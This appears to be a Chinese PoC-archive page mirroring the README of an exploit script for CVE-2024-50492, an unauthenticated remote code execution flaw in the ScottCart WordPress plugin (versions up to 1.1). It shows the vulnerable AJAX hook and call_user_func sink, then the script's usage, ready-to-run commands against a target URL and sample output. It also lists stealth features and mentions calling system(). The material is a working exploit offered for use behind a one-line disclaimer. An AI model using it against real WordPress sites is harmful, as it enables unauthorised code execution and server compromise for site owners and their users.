关联漏洞
标题:
WordPress plugin ScottCart 代码注入漏洞
(CVE-2024-50492)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin ScottCart 1.1版本及之前版本存在代码注入漏洞,该漏洞源于代码生成控制不当,导致代码注入漏洞。
描述
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
介绍
# 🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE Exploit
> 🔥 Exploit Script for ScottCart <= 1.1 - Unauthenticated Remote Code Execution
> 🧑💻 By Nxploit – *Khaled Alenazi*
---
## 📌 Description
The **ScottCart** plugin for WordPress (versions ≤ 1.1) is vulnerable to **Remote Code Execution (RCE)**.
This allows **unauthenticated attackers** to execute arbitrary PHP functions on the server through a vulnerable AJAX endpoint.
- **Plugin**: ScottCart ≤ 1.1
- **Vulnerability**: Unauthenticated Function Injection → RCE
- **CVE**: CVE-2024-50492
- **CVSS Score**: **9.8 - Critical**
---
## 🧠 How it works
The plugin registers an unprotected AJAX action:
```php
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
```
Which executes:
```php
call_user_func($_POST['function']);
```
Allowing attackers to call **any existing PHP function**, like:
- `phpinfo()`
- `scottcart_get_the_user_ip()`
- `system()` ← if extended in modified environments
---
## 🚀 Exploit Features
- ✅ Automatically sends crafted payload to trigger the vulnerable endpoint
- ✅ Allows function override via argument
- ✅ Default payload: `phpinfo()` for PoC
- ✅ Saves output to timestamped file (e.g., `results_2025-03-26_14-33-01.txt`)
- ✅ Custom `User-Agent`, error handling, and SSL ignore for stealth
---
## 🖥️ Usage
```bash
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Show this help message and exit
-u URL, --url URL Target base URL (e.g., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Function to call (default: phpinfo)
```
---
## 💡 Examples
### 🔍 Default behavior (PoC with `phpinfo()`):
```bash
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
```
### 🔎 Call internal plugin function:
```bash
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
```
---
## 🧾 Output Example
```
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
```
📁 And saved in: `results_2025-03-26_14-33-01.txt`
---
## 🛡️ Disclaimer
This tool is for **educational and authorized testing** purposes only.
Do **not** use against systems you do not own or have explicit permission to test.
---
## 💬 Credits
- 💻 Exploit by: [Nxploit – Khaled Alenazi](https://github.com/Nxploited)
- 🛡️ CVE ID: CVE-2024-50492
文件快照
[4.0K] /data/pocs/eb24fe31c878a7e9082f07d22dc46377e6b9db30
├── [2.7K] CVE-2024-50492.py
├── [1.1K] LICENSE
├── [2.6K] README.md
└── [ 15] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。